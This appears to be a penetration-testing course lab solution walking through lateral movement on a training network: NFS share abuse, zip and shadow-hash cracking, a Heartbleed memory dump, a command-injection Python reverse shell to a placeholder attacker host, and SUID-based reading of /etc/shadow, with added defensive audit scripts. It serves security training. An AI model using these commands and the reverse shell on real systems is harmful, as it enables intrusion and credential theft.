© 2018 Caendra Inc. - Hera For Ptpv5 - Linux Exploitation (Lateral Movement)

The document discusses lateral movement techniques on Linux systems within the Robots To Go network. It describes exploiting vulnerabilities like improper NFS permissions and SSH passwords obtained via Heartbleed to move from one system to another, elevating privileges using SUID binaries to eventually obtain root access on a system.



Having gained entry to the Robots To Go, Inc. network by exploiting multiple vulnerabilities on
several of their Linux systems, we are now tasked with moving laterally through the environment.
We continue by harvesting credentials and other sensitive information from the hosts we already
control and using it to reach systems we could not access initially.

Target Organization: Robots To Go, Inc.

Scope: The scope is limited to the following domain and netblock:

1. Netblock: 172.16.80.1/24
2. Domain: robotstogo.localdomain

Task: Perform lateral movement tasks on the live systems.

• Identify vulnerabilities from a remote exploitation perspective.
• Use discovered vulnerabilities to move laterally to other machines.
• Elevate privileges.

Tools:

• Metasploit
• Nmap
• Bash shell
• Netcat

We have obtained access to multiple systems within Robots To Go, Inc.'s environment using a
number of different techniques and exploits. The next phase is lateral movement, in order to
complete the objectives defined by the customer. Using what we learned in the previous phases
of the engagement, we strengthen our footholds within the target infrastructure and use the
information and credentials collected from compromised hosts to move onto systems we did not
have access to initially.

Below, you can find solutions for each of the Lateral Movement tasks. Remember that you can
follow your own strategy, which may differ from the one explained in the following lab.
Additionally, the labs contain further vulnerabilities that are not covered below; they can also
be exploited but are not necessarily required to complete the tasks. Exploit as many of the
vulnerabilities you find!

During the initial enumeration phase, an NFS share on 172.16.80.27 should have revealed
something useful (a .zip archive). Use the contents of that archive to obtain access to another
system.

While enumerating NFS shares with nmap's nfs-ls script, we found that one export was listable
by our (unauthenticated) client and contained a "backup.zip" file:

# nmap --script nfs-ls 172.16.80.27

Next, we mount that export locally and access the backup.zip archive:

# mkdir /mnt/172.16.80.27_nfs
# mount -t nfs 172.16.80.27:/home/simon /mnt/172.16.80.27_nfs -o nolock
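The fact that an arbitrary client on the subnet could mount /home/simon is the "improper NFS permissions" issue this task exercises. As an added example (not part of the lab write-up), the following Python audits an /etc/exports file for the options that create that exposure. The exports content below is constructed for illustration; the page does not show the server's real export line.

```python
# Added example: audit /etc/exports entries for exposure to any host and
# for the options that matter most to an attacker. The SAMPLE_EXPORTS
# text is constructed, not taken from the lab host.
import re

# Options that deserve a finding, and why.
RISKY_OPTIONS = {
    "no_root_squash": "remote root keeps uid 0 on the share",
    "insecure": "accepts mounts from non-privileged source ports",
    "rw": "share is writable by the client",
}


def parse_exports(text):
    """Return (path, client, option_set) tuples for every export entry.

    Syntax is '/path client(opt,opt) client2(opts)'. A client with no
    parenthesised options gets the NFS defaults (ro, root_squash, secure).
    Note the classic mistake '/path host (rw)': the space makes '(rw)' a
    second entry whose client is everyone, and this parser reports it so.
    """
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:]
        if not clients:
            clients = ["*"]  # no client spec at all means everyone
        for spec in clients:
            m = re.match(r"^([^(]*)(?:\((.*)\))?$", spec)
            client = m.group(1) or "*"
            opts = set(m.group(2).split(",")) if m.group(2) else set()
            entries.append((path, client, opts))
    return entries


def audit_exports(text):
    """Return (path, client, finding) tuples for risky entries."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client in ("*", "0.0.0.0/0"):
            findings.append((path, client, "exported to any host"))
        for opt, why in RISKY_OPTIONS.items():
            if opt in opts:
                findings.append((path, client, f"{opt}: {why}"))
    return findings


SAMPLE_EXPORTS = """\
# constructed example, not the lab host's real /etc/exports
/home/simon  *(rw,sync,no_root_squash)
/srv/backup  172.16.80.0/24(ro,sync,root_squash)
/srv/iso     *
"""

if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:12} {client:18} {finding}")
```

Run against a real file with `audit_exports(open("/etc/exports").read())`; the corrected form of the first line would restrict the client to a host or netblock and drop no_root_squash (and rw, if clients only need to read).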

Once the share is mounted, we change into our local /mnt/172.16.80.27_nfs directory and copy
the backup.zip file to /tmp:

# cd /mnt/172.16.80.27_nfs
# cp backup.zip /tmp
# cd /tmp

We quickly find that when attempting to unzip the archive, it is password protected:

# unzip backup.zip

We can use "fcrackzip" to run a dictionary attack against the archive with the rockyou.txt
wordlist (-D selects dictionary mode, -p names the wordlist, -u verifies each candidate with
unzip to weed out false positives, and -v is verbose):

# fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt backup.zip

The fcrackzip program successfully cracks the backup.zip archive, and reveals a password of
“====0open/n”:

We unzip the archive with the recovered password:

# unzip -P '====0open/n' backup.zip

We can now read the file contained in the backup.zip archive:

# cd backup/
# cat notes.txt

TEMP MGMT CONSOLE:
https://172.16.80.24:4433/xl0827_dev_

The "notes.txt" file points to a hidden web directory on another system, 172.16.80.24, on
port 4433, which we navigate to next:

Clicking on the “here” link within the page reveals a parameter (x=) in the URL of the page:

Reading the message left for the organization's developers, there is a good chance that
parameter is passed to a shell and we can execute arbitrary commands through it. We try "?x=id":

url: https://172.16.80.24:4433/xl0827_dev_/?x=id

We have confirmed command execution via the "x" parameter. Let's use it to get a reverse shell,
again with a netcat listener on our attacker machine, but this time executing a Python reverse
shell from the "x" parameter:

On attacker:

# nc -nlvp 1234

On target system via the “x” parameter of the hidden web page (make sure to change
<ATTACKER_IP> and <ATTACKER_PORT> values to your listener parameters, and also, the
below code may need to be manually typed, as to make sure all characters are properly

URL:

https://172.16.80.24:4433/xl0827_dev_/?x=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ATTACKER_IP>",<ATTACKER_PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We receive a reverse shell as the "www-data" user:

We have used information from an NFS share on 172.16.80.27 to obtain access to a hidden
directory on 172.16.80.24 as the "www-data" user.

During enumeration, we identified that 172.16.80.24 runs a web server on port 4433 over HTTPS.
Scanning that port for vulnerabilities shows it is vulnerable to Heartbleed. We put a "+" before
the script name so that nmap runs the script against port 4433 even though the script's own port
rule would not select it:

# nmap --script +ssl-heartbleed 172.16.80.24 -p 4433

Having identified a host vulnerable to Heartbleed, we use the Metasploit openssl_heartbleed
auxiliary module with the DUMP action to retrieve contents of the server process's memory, in
the hope of finding credentials or other sensitive information we can use to log onto other
systems:

msf > use auxiliary/scanner/ssl/openssl_heartbleed


msf > set RHOSTS 172.16.80.24
msf > set RPORT 4433
msf > set action DUMP
msf > exploit

Since the module reports success, we run "strings" against the resulting .bin loot file to reveal
readable data from the dumped memory:

# strings /root/.msf4/loot/….openssl.heartble_151722.bin
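Piping strings through grep is usually enough, but when a dump is large it helps to have the filter in code. As an added example (not part of the lab), the following Python reimplements the printable-run extraction that strings(1) performs and then flags lines that look like form credentials, Basic auth headers or cookies, which is the kind of request fragment Heartbleed leaks. The sample bytes are constructed to resemble such a dump; they are not the lab's loot file, and the credential patterns are our own.

```python
# Added example: strings(1)-style extraction plus a credential filter for a
# Heartbleed memory dump. SAMPLE_DUMP is constructed; patterns are ours.
import re


def extract_strings(blob, min_len=4):
    """Printable ASCII runs of at least min_len bytes, like strings(1)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


# Things worth a second look in leaked HTTP request fragments.
CRED_PATTERNS = [
    re.compile(r"(?i)\b(user(?:name)?|login|pass(?:word|wd)?|pwd)=([^&\s]+)"),
    re.compile(r"(?i)^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)"),
    re.compile(r"(?i)^Cookie:\s*(.+)"),
]


def find_credentials(strings):
    """Return (source_string, matched_fragment) pairs for credential-like data."""
    hits = []
    for s in strings:
        for pat in CRED_PATTERNS:
            for m in pat.finditer(s):
                hits.append((s, m.group(0)))
    return hits


def loot_summary(blob):
    """Convenience wrapper: dump bytes in, credential hits out."""
    return find_credentials(extract_strings(blob))


# Constructed dump: a TLS record header, then fragments of a POST request
# separated by NUL and other non-printable bytes, as a real dump would have.
SAMPLE_DUMP = (
    b"\x00\x00\x18\x03\x02\x00\x03\x01\x40\x00"
    b"POST /login HTTP/1.1\r\n\x00\x00"
    b"Host: 172.16.80.24:4433\r\n\x00"
    b"Cookie: PHPSESSID=constructedsessionvalue\r\n"
    b"\x7f\x00\x00username=amanda&password=ConstructedPass1\x00\x00"
    b"ab\x00"  # shorter than min_len, so dropped like strings(1) would
)

if __name__ == "__main__":
    for source, fragment in loot_summary(SAMPLE_DUMP):
        print(f"{fragment:45} <- {source}")
```

On the real loot file: `loot_summary(open(path, "rb").read())`. Heartbleed returns whatever happened to be adjacent in the heap, so run the module several times; credentials from a login that happened minutes ago may only appear in one of the dumps.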

This looks like credentials for a user "amanda". Thinking back to the information gathering
phase, SMB enumeration of the 172.16.80.27 machine should have turned up a user named "amanda".
We try the recovered credentials against the SSH port of 172.16.80.27:

# ssh amanda@172.16.80.27

We successfully log onto 172.16.80.27 as "amanda" using credentials obtained through the
Heartbleed memory dump from 172.16.80.24:

One of our first steps at this point is post-exploitation enumeration of the system. Listing
SUID binaries shows, among other things, a root-owned SUID executable, "/usr/local/bin/catme",
that "amanda" can run:

$ find / -perm -4000 2>/dev/null
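The find output on a real host is long, and the interesting entry is easy to miss among the distribution's own SUID binaries. As an added example (not part of the lab write-up), the following Python triages that output the way we did by eye: anything not in a baseline of expected SUID binaries is reported, and anything outside the directories packages normally install into (such as /usr/local/bin) is called out separately. The baseline is an illustrative subset, not a full distribution list, and the find output below is constructed.

```python
# Added example: triage `find / -perm -4000` output against a baseline.
# BASELINE is an illustrative subset of common distro SUID binaries and
# FIND_OUTPUT is constructed; neither is the lab host's real data.
from pathlib import PurePosixPath

BASELINE = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd",
}

# Where package managers install binaries. SUID files anywhere else
# (/usr/local, /opt, /home, /tmp, ...) were put there by a human.
PACKAGED_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib")


def triage_suid(find_output):
    """Return {path: reason} for every SUID path worth a closer look."""
    suspects = {}
    for raw in find_output.splitlines():
        path = raw.strip()
        if not path.startswith("/"):
            continue  # drop 'Permission denied' noise if stderr leaked in
        if path in BASELINE:
            continue
        parent = str(PurePosixPath(path).parent)
        packaged = any(parent == d or parent.startswith(d + "/")
                       for d in PACKAGED_DIRS)
        if packaged:
            suspects[path] = "SUID binary not in baseline"
        else:
            suspects[path] = "SUID binary outside packaged directories"
    return suspects


FIND_OUTPUT = """\
/bin/su
/bin/mount
/usr/bin/passwd
/usr/bin/sudo
/usr/local/bin/catme
/usr/bin/pkexec
find: '/proc/1/task': Permission denied
"""

if __name__ == "__main__":
    for path, reason in triage_suid(FIND_OUTPUT).items():
        print(f"{path:25} {reason}")
```

Both categories still need manual review (pkexec is a legitimate SUID binary on many systems, it is just not in this short baseline), but the split puts the hand-installed binaries at the top of the list.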

We find that the "catme" executable reads any file as root, with no restriction on the path:

$ catme /etc/passwd

In the image above, you will also notice that the user "damien" has a UID of 0 in /etc/passwd,
which makes that account a root account in all but name. Since "catme" lets us read any file as
root, we can also read /etc/shadow, so we will attempt to crack the "damien" user's hash and see
whether it gets us root access. We will use "unshadow" and "john", but first we copy both
/etc/passwd and /etc/shadow to the /tmp directory on the system by redirecting the output of the
SUID executable:

$ cd /tmp
$ catme /etc/passwd > passwd
$ catme /etc/shadow > shadow

Once both files are in /tmp, we need to transfer them to our attacker system. One option is to
spin up a Python HTTP server on port 8888 on the target and download the two files from it (with
Python 3 the equivalent module is http.server). Note that this exposes the files to anyone on the
subnet for as long as the server runs; since we already have SSH access as "amanda", scp is the
quieter alternative.

Target System in /tmp directory:

$ python -m SimpleHTTPServer 8888

On Attacker system to copy files from target:

# wget http://172.16.80.27:8888/passwd
# wget http://172.16.80.27:8888/shadow

Next, on our attacker system, we use "unshadow" to merge the two files into the single-file
format john expects (each passwd line with its "x" replaced by the hash from shadow):

# unshadow passwd shadow > shadow.john
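Two things happened in the last few steps that are worth having in code: spotting the second UID-0 account in /etc/passwd, and merging passwd with shadow the way unshadow does. As an added example (not part of the lab write-up), the following Python implements both, plus a check for which accounts actually have a crackable hash rather than a locked ("!" or "*") field, so time is not wasted feeding locked accounts to john. The file contents are constructed; the usernames match the lab but the hash values are placeholders, not real hashes.

```python
# Added example: UID-0 audit, unshadow-style merge and crackability check
# over dumped /etc/passwd and /etc/shadow. PASSWD and SHADOW below are
# constructed; hash fields are placeholders, not real crypt(3) output.


def parse_passwd(text):
    """Map username -> the 7 colon-separated passwd fields."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip damaged lines rather than guess at them
        users[fields[0]] = fields
    return users


def parse_shadow(text):
    """Map username -> shadow hash field (second column)."""
    hashes = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    return hashes


def uid0_accounts(passwd_text):
    """Every account with UID 0; all of them are root, whatever the name."""
    return sorted(name for name, f in parse_passwd(passwd_text).items()
                  if f[2] == "0")


def unshadow(passwd_text, shadow_text):
    """Merge like unshadow(8): passwd lines with the hash in field two."""
    hashes = parse_shadow(shadow_text)
    merged = []
    for name, f in parse_passwd(passwd_text).items():
        f = list(f)
        f[1] = hashes.get(name, f[1])
        merged.append(":".join(f))
    return "\n".join(merged) + "\n"


def crackable_accounts(shadow_text):
    """Accounts whose hash field is a real hash, not empty, '*' or '!'."""
    return sorted(name for name, h in parse_shadow(shadow_text).items()
                  if h and not h.startswith(("*", "!")))


PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
damien:x:0:0:damien,,,:/home/damien:/bin/bash
amanda:x:1001:1001:amanda,,,:/home/amanda:/bin/bash
"""

SHADOW = """\
root:*:17000:0:99999:7:::
daemon:*:17000:0:99999:7:::
damien:$6$saltsalt$CONSTRUCTEDHASHVALUE:17000:0:99999:7:::
amanda:$6$saltsalt$ANOTHERPLACEHOLDER:17000:0:99999:7:::
"""

if __name__ == "__main__":
    print("uid 0 accounts:", uid0_accounts(PASSWD))
    print("crackable     :", crackable_accounts(SHADOW))
    print(unshadow(PASSWD, SHADOW), end="")
```

On real dumps: `unshadow(open("passwd").read(), open("shadow").read())` written to a file is what john consumes, and `uid0_accounts` is the check that would have caught "damien" without reading /etc/passwd by eye.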

Next, we run john against shadow.john using the "fasttrack.txt" dictionary as the wordlist:

# john shadow.john --wordlist=/usr/share/wordlists/fasttrack.txt

John quickly cracks the password (secuirty3) for "damien", and we can now log into 172.16.80.27
as that user. The passwd entry also shows that the primary GID is 0 (root), and enumerating the
current user shows that "damien" is a member of the "sudo" group, which on a default sudoers
configuration allows running any command as root.

# ssh damien@172.16.80.27

Knowing this, we spawn a bash shell through sudo and, after entering Damien's password, obtain
a shell with UID 0:

Root again!
